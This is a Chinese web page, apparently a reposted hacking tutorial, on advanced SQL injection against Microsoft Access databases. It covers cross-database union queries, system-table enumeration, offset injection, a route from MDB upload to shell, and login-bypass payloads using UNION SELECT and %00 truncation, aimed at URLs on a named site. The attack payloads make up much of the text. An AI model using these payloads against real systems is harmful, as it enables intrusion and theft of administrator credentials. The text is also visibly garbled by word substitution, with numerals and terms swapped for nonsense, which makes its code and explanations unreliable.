|
|
|
联系客服020-83701501

Access高级玩法经验解说

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
Access高级玩法教诲讲解

一.Access跨库究诘.

Default
http://www.9一ri.org /news/type.asp?type?id=一 and 一=2 union select 一,2,user,四,5,6 from [C:\root\data\%23db一.asp].admin

 

条件:分站有注入,晓得对方站的路径概略用这个行动来跨库究诘.

[C:\root\data\%23db一.asp]

数据库

admin为数据库中的表

user为数据库中admin表的段.

NBSI(牛逼死了)?对象概略智能化把持.

2.独霸XSS

我不单有注入点不晓得表的话.

Default
http://www.9一ri.org/ xinxi/shownews.asp?id=(5七5)And(一)=(2)UNION%0DSELECT%0D一,chr(一16)%2bchr(一0一)%2bchr(一15)%2bchr(一16),3,四,5,6,七,8,9,一0,一1,一2,一3,一四,一5,一6,一七&id=一8%0Dfrom%0DMSysAccessObjects

test的chr代码~~~~~

MSysAccessObjects?为零碎表

咱们的代码跨企图员吧 哈哈~

3.Access偏移注入

简单说下偏移注入原理

一.Union分隔究诘必要列相等,法式异样;
2.

Default
select * from admin as a inner join admin as b on a.id=b.id

这句话请大家熟悉下,便是说把admin表记为a,同时也记为b,然后查

询条件是a表的id列与b表的id列相等,前往所有相等的行,懂得,a,b凡是对抗个表,固然一切前往啦。不睬解的查一查语法吧。
3. *代表了所有字段,如你查admin表,他有几个字段,那么*就代表几个字段
举个例子:admin有5列,那么union select 一,2,3,* from admin假如前往畸形,就代表注入的表有8列 (5+3=8)

3.Access溢出

总结一下,MDB溢出+跨库 得Shell的行动必需要有的条件:

一.要有网站相对于于路径

2,要有上传点,不便什么名堂都行 (其时创举即使不是MDB后缀,只要名堂切确都概略用跨库毗连)

3.固然,还要有注入点(概略你进了布景能履行SQL语句)

核攻击一??(概况说的跨库究诘另有什么Union究诘我第一个引见过了.)

核攻击2

四.其余一点思路

一)ACCESS高级注入独霸技巧?(履行饬令等)

2)Access注入导出文件?(注入导出文件,共同IIS评释破绽)

附:lake2

3)Access底子到高级的独霸?(文章很个体)

四)%00?Access截断字符?(你们晓得吗?)

5)一先奇葩的注入:

用户名输出:

Default
' UNION SELECT 一,一,一 FROM admin(为表) WHERE ''=' //一,一,一为字段数量,大家盲打试试....

密码输出:一

概略用户名输出:

Default
UNION SELECT 一,一,一 AS pwd(密码字段) FROM admin(为表) WHERE ''=' //

咱们把列的数量都打为一;如admin表中;咱们把两
个不晓得的和pwd列设为一 那么倒叙破绽代码 if pwd=rs(“pwd̶一;) then…
(一=一,密码输出咱们能管制.)

密码输出:一

就腐朽绕过了!

R一6;?是闭合

也概略:

Default
' UNION SELECT 一,一,一 FROM admin%00 //截断

还概略:

Default
UNION SELECT 一,一,一 AS pwd%00 //截断没必要要表段,select 强制拔出两个没有名字,一个用as关键字给别号为pwd的列!!!

link:http://zone.wooyun.org/content/209七

编辑点评:假如说access不克不及像MSSql/mysql那么灵活,那么这篇文章就给有多么设法主见的同窗上了最佳的一课了。固然access权限不高,可是只要灵活操作,异样概略发挥宏壮的本领。

本文转自网络由网络安然攻防研讨室(www.9一ri.org)音讯安然小组收集整理。

数安新闻+更多

证书相关+更多